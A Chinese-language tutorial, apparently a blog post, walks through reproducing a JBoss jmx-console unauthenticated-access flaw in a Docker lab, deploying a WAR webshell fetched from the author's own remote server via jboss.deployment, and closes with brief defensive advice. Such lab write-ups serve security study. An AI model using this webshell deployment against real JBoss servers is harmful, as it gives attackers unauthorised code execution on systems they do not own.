1. 程式人生 > 實用技巧 >淺談未授權漏洞——Jboss未授權getshell

淺談未授權漏洞——Jboss未授權getshell

0x01 漏洞描述

JBoss是一個基於J2EE的開放原始碼應用伺服器,程式碼遵循LGPL許可,可以在任何商業應用中免費使用;JBoss也是一個管理EJB的容器和伺服器,支援EJB 1.1、EJB 2.0和EJB3規範。,預設情況下訪問 http://ip:8080/jmx-console 就可以瀏覽 JBoss 的部署管理的資訊不需要輸入使用者名稱和密碼可以直接部署上傳木馬有安全隱患。

0x02 環境搭建

目標靶機:mac os
ip:192.168.2.85

攻擊機:windows 7
ip:192.168.2.86

木馬伺服器:centos
ip:39.xxx.xxx.88      //安全起見隱藏個人vps

1.使用docker拉取Jboss映象,並且執行Jboss

docker search testjboss
docker pull testjboss/jboss:latest
docker images
docker run -p 8080:8080 -d 5661a2e31006

0x03 漏洞復現

未授權放分訪問

http://192.168.2.85:8080/jmx-console/ 無需認證進入控制頁面

利用jboss.deployment部署shell

利用vps搭建遠端木馬伺服器

在下圖的地方訪問木馬伺服器http://39.xxx.xxx.88/test3693.war (圖片填寫地址有誤,請參考自己的vps地址)

上傳war包木馬成功

訪問http://192.168.2.85:8080/test3693/

漏洞利用成功...

0x04 防禦措施

  • 對jmx控制頁面訪問新增訪問驗證。
  • 進行JMX Console 安全配置。